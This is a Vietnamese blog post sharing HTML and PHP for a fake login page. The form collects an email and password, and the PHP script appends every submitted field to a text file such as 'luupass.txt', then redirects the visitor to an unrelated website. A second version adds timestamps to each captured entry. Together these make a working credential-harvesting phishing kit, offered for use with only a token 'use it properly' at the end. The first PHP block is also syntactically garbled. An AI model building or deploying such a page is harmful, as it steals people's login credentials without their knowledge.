Thứ Tư, 15 tháng 10, 2014

Bài viết này mình share code Code php gởi thông tin về file txt, code lấy thông tin đăng nhập về file txt.
Đầu tiên thì các bạn phải tạo 1 file html đơn giản như sau hoặc là như thế nào tùy ý bạn :
<html><form method="GET" action="login.php"><div><input placeholder="ten" name="email" type="text"><input placeholder="MK" name="pass" type="password"></div><div><button type="submit" value="Dn" name="login">DN</button></div>
</form></html>
Như html trên thì file login.php ta sẽ có cú pháp như sau :
<?php
header 
('Location: http://kogsand.com');$handle fopen("luupass.txt""a");
foreach(
$_GET as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");fclose($handle);
exit;
?>
Như thế thì thông tin về file luupass.txt sẽ là Email và Pass.
Nếu các bạn muốn có thêm ngày tháng nữa thì có thể làm như sau :
PHP Code:
<?php
$now = getdate();
$currentTime = $now["hours"] . ":" . $now["minutes"] . ":" . $now["seconds"];
$currentDate = $now["mday"] . "." . $now["mon"] . "." . $now["year"];
$currentWeek = $now["wday"] . ".";


$currentDate = $now["mday"] . "." . $now["mon"] . "." . $now["year"];

header ('Location: http://www.xaluan.com/modules.php?name=News&file=article&sid=988297');
$handle = fopen("fileghipass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, " nay nhap luc $currentTime ngay $currentDate=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Chúc các bạn thành công và sử dụng đúng mục đích của nó.

0 nhận xét:

Đăng nhận xét